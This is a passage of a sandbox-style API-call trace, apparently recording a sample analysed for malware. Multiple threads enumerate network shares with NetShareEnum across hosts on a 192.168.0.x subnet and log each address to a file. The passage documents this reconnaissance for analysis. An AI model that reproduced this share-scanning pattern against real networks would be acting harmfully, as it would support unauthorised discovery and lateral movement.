(in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x339ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0134.417] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0134.417] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0134.417] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x339fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x339fc54*=0x10, lpOverlapped=0x0) returned 1 [0134.422] NetShareEnum (in: servername="\\\\192.168.0.74", level=0x1, bufptr=0x339fedc, prefmaxlen=0xffffffff, entriesread=0x339fed4, totalentries=0x339fed0, resume_handle=0x339fecc | out: bufptr=0x339fedc, entriesread=0x339fed4, totalentries=0x339fed0, resume_handle=0x339fecc) returned 0x35 [0178.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.190", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.190", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.190", lpUsedDefaultChar=0x0) returned 15 [0178.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x339ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x339ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.479] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x339fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x339fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.483] NetShareEnum (in: servername="\\\\192.168.0.190", level=0x1, bufptr=0x339fedc, prefmaxlen=0xffffffff, entriesread=0x339fed4, totalentries=0x339fed0, resume_handle=0x339fecc | out: bufptr=0x339fedc, entriesread=0x339fed4, totalentries=0x339fed0, resume_handle=0x339fecc) returned 0x35 [0211.199] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.229", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.199] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.229", cchWideChar=15, lpMultiByteStr=0x1e8304c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.229", lpUsedDefaultChar=0x0) returned 15 [0211.199] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x339fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x339fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x339ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x339ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.298] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x339fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x339fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.307] NetShareEnum (in: servername="\\\\192.168.0.229", level=0x1, bufptr=0x339fedc, prefmaxlen=0xffffffff, entriesread=0x339fed4, totalentries=0x339fed0, resume_handle=0x339fecc | out: bufptr=0x339fedc, entriesread=0x339fed4, totalentries=0x339fed0, resume_handle=0x339fecc) returned 0x35 [0258.071] SetEvent (hEvent=0x1dc) returned 1 [0258.071] RtlExitUserThread (Status=0x0) Thread: id = 35 os_tid = 0xc1c [0088.257] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.14", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.257] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.14", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.14", lpUsedDefaultChar=0x0) returned 14 [0088.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x34dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.257] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.257] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x34dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.258] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.258] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.258] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x34dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x34dfc54*=0x10, lpOverlapped=0x0) returned 1 [0088.258] NetShareEnum (in: servername="\\\\192.168.0.14", level=0x1, bufptr=0x34dfedc, prefmaxlen=0xffffffff, entriesread=0x34dfed4, totalentries=0x34dfed0, resume_handle=0x34dfecc | out: bufptr=0x34dfedc, entriesread=0x34dfed4, totalentries=0x34dfed0, resume_handle=0x34dfecc) returned 0x35 [0134.410] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.73", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0134.410] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.73", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.73", lpUsedDefaultChar=0x0) returned 14 [0134.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x34dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0134.410] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0134.410] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0134.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x34dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0134.410] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0134.410] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0134.410] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x34dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x34dfc54*=0x10, lpOverlapped=0x0) returned 1 [0134.414] NetShareEnum (in: servername="\\\\192.168.0.73", level=0x1, bufptr=0x34dfedc, prefmaxlen=0xffffffff, entriesread=0x34dfed4, totalentries=0x34dfed0, resume_handle=0x34dfecc | out: bufptr=0x34dfedc, entriesread=0x34dfed4, totalentries=0x34dfed0, resume_handle=0x34dfecc) returned 0x35 [0178.458] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.187", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.458] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.187", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.187", lpUsedDefaultChar=0x0) returned 15 [0178.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x34dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.458] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.458] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x34dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.458] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.458] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.458] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x34dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x34dfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.463] NetShareEnum (in: servername="\\\\192.168.0.187", level=0x1, bufptr=0x34dfedc, prefmaxlen=0xffffffff, entriesread=0x34dfed4, totalentries=0x34dfed0, resume_handle=0x34dfecc | out: bufptr=0x34dfedc, entriesread=0x34dfed4, totalentries=0x34dfed0, resume_handle=0x34dfecc) returned 0x35 [0211.196] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.223", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.196] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.223", cchWideChar=15, lpMultiByteStr=0x1e82f8c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.223", lpUsedDefaultChar=0x0) returned 15 [0211.196] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x34dfc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x34dfc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.287] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x34dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.287] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.288] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.288] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x34dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.288] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.288] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.288] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x34dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x34dfc54*=0x11, lpOverlapped=0x0) returned 1 [0211.288] NetShareEnum (in: servername="\\\\192.168.0.223", level=0x1, bufptr=0x34dfedc, prefmaxlen=0xffffffff, entriesread=0x34dfed4, totalentries=0x34dfed0, resume_handle=0x34dfecc | out: bufptr=0x34dfedc, entriesread=0x34dfed4, totalentries=0x34dfed0, resume_handle=0x34dfecc) returned 0x35 [0258.064] SetEvent (hEvent=0x1dc) returned 1 [0258.064] RtlExitUserThread (Status=0x0) Thread: id = 36 os_tid = 0xc20 [0088.259] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.15", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.259] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.15", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.15", lpUsedDefaultChar=0x0) returned 14 [0088.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x361ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.260] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.260] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x361ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.260] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.260] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.260] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x361fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x361fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.260] NetShareEnum (in: servername="\\\\192.168.0.15", level=0x1, bufptr=0x361fedc, prefmaxlen=0xffffffff, entriesread=0x361fed4, totalentries=0x361fed0, resume_handle=0x361fecc | out: bufptr=0x361fedc, entriesread=0x361fed4, totalentries=0x361fed0, resume_handle=0x361fecc) returned 0x35 [0144.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.82", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.82", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.82", lpUsedDefaultChar=0x0) returned 14 [0144.117] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x361ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.117] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x361ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.117] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x361fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x361fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.125] NetShareEnum (in: servername="\\\\192.168.0.82", level=0x1, bufptr=0x361fedc, prefmaxlen=0xffffffff, entriesread=0x361fed4, totalentries=0x361fed0, resume_handle=0x361fecc | out: bufptr=0x361fedc, entriesread=0x361fed4, totalentries=0x361fed0, resume_handle=0x361fecc) returned 0x35 [0178.404] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.179", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.405] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.179", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.179", lpUsedDefaultChar=0x0) returned 15 [0178.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x361ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.405] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.405] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x361ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.405] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.405] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.405] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x361fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x361fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.409] NetShareEnum (in: servername="\\\\192.168.0.179", level=0x1, bufptr=0x361fedc, prefmaxlen=0xffffffff, entriesread=0x361fed4, totalentries=0x361fed0, resume_handle=0x361fecc | out: bufptr=0x361fedc, entriesread=0x361fed4, totalentries=0x361fed0, resume_handle=0x361fecc) returned 0x35 [0211.194] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.220", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.194] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.220", cchWideChar=15, lpMultiByteStr=0x1e82f2c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.220", lpUsedDefaultChar=0x0) returned 15 [0211.194] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x361fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, 